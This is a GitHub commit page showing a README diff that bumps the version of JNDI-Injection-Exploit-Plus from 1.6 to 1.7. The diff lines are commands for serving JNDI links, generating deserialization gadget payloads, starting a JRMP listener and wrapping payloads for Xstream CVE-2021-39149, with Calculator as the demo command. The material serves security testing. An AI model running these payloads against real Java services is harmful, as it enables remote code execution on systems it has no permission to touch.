Skip to content

Commit

Permalink
update README
Browse files Browse the repository at this point in the history
  • Loading branch information
cckuailong committed Sep 26, 2022
1 parent f1c30c1 commit b87b886
Show file tree
Hide file tree
Showing 2 changed files with 16 additions and 16 deletions.
16 changes: 8 additions & 8 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -113,15 +113,15 @@ Xstream | CVE-2021-39149
- Example

```shell
$ java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
$ java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
```

![](./img/4.png)

#### Web service to return Deserial Gadgets

```shell
java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar
java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar
```

```shell
Expand All @@ -141,7 +141,7 @@ P.S. Param wrapper & output is opetional
Run as

```shell
$ java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar [-C] [command] [-A] [address]
$ java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar [-C] [command] [-A] [address]
```

where:
Expand Down Expand Up @@ -171,7 +171,7 @@ Points for attention:
Run as

```shell
$ java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [bin/base64/hex]
$ java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [bin/base64/hex]
```

where:
Expand All @@ -189,13 +189,13 @@ where:
- JRMPListener

```shell
java -cp JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
java -cp JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
```

- JRMPClient

```shell
java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
```

## Examples
Expand All @@ -207,7 +207,7 @@ Local demo:
1. Start the tool like this:

```shell
$ java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
$ java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
```

Screenshot:
Expand Down Expand Up @@ -238,7 +238,7 @@ For More Examples: [Test-JNDI-Injection-Exploit-Plus](https://github.com/cckuail
### Deserialization Payloads

```shell
$ java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
$ java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
```

Base64 Output Result:
Expand Down
16 changes: 8 additions & 8 deletions README_zh.md
Original file line number Diff line number Diff line change
Expand Up @@ -19,7 +19,7 @@ P.S. 具体利用链名称及依赖见 [表格](./README.md)
#### 使用方法

```
$ java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar [-C] [command] [-A] [address]
$ java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar [-C] [command] [-A] [address]
```

#### 参数说明
Expand All @@ -39,7 +39,7 @@ $ java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar [-C] [command] [-A]
1. 运行工具

```
$ java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
$ java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
```

![](./img/1.png)
Expand All @@ -64,7 +64,7 @@ class Test{
#### 使用方法

```
$ java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [bin/base64]
$ java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [bin/base64]
```

#### 参数说明
Expand All @@ -84,7 +84,7 @@ $ java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar [-C] [command] [-D]
1. 普通

```
$ java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
$ java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
```

![](./img/3.png)
Expand All @@ -93,12 +93,12 @@ $ java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar -C "/System/Applica

- JRMPListener
```
java -cp JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
java -cp JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
```

- JRMPClient
```
java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
```

#### 提供反序列化包装器
Expand All @@ -110,15 +110,15 @@ Xstream | CVE-2021-39149
- 示例

```shell
$ java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
$ java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
```

![](./img/4.png)

#### 可以返回反序列化数据的web服务

```shell
java -jar JNDI-Injection-Exploit-Plus-1.6-SNAPSHOT-all.jar
java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar
```

```shell
Expand Down

0 comments on commit b87b886

Please sign in to comment.